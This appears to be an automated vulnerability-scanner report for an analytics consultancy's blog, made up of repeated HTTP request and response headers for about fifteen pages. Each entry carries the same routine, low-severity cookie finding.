GET /blog/55-googleanalytics/109-google-analytics-training-san-jose-2010.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 02:18:25 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 02:18:26 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 02:18:27 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 20976
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/55-googleanalytics/113-domain-hostname-content-reports.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 02:17:31 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 02:17:34 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 02:17:34 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 39213
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/55-googleanalytics/114-share-advanced-segment-google-analytics.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 00:01:08 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 00:01:17 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 00:01:17 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 21206
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/55-googleanalytics/115-analytics-toolbar-for-dma-known-issues.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:33:17 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Wed, 26-Oct-2011 23:33:24 GMT; path=/ Last-Modified: Fri, 05 Nov 2010 23:33:24 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22073
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/55-googleanalytics/117-campaign-tracking-with-google-analytics-email-banners-and-more.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:33:14 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Wed, 26-Oct-2011 23:33:15 GMT; path=/ Last-Modified: Fri, 05 Nov 2010 23:33:15 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 29413
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/55-googleanalytics/122-traning-workshop-washington-dc-2010.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:33:12 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Wed, 26-Oct-2011 23:33:13 GMT; path=/ Last-Modified: Fri, 05 Nov 2010 23:33:13 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 26025
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/55-googleanalytics/60-ga-extended-segments-part-1.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 02:57:41 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 02:57:42 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 02:57:42 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 28702
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/55-googleanalytics/62-tracking-actual-adwords-keywords.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 02:19:19 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 02:19:20 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 02:19:20 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 23931
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/55-googleanalytics/63-kintiskton-llc-in-google-analytics.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 02:46:20 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 02:46:21 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 02:46:21 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 35241
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/55-googleanalytics/68-unobfuscate-gajs-file.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 02:43:06 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 02:43:07 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 02:43:07 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 21214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/55-googleanalytics/77-refresh-rate-content-metric.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 02:42:50 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 02:42:55 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 02:42:56 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 27914
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/55-googleanalytics/79-google-analytincs-training-emetrics-dc-2009.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 02:42:43 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 02:42:44 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 02:42:44 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 21758
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/55-googleanalytics/86-google-analytics-intelligence.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 02:46:20 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 02:46:21 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 02:46:21 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 21634
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/55-googleanalytics/89-dont-kill-the-messenger.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 02:44:59 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 02:45:00 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 02:45:00 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 23610
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/55-googleanalytics/91-google-analytics-cookies-and-domains.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 02:43:39 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 02:43:40 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 02:43:40 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 51581
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
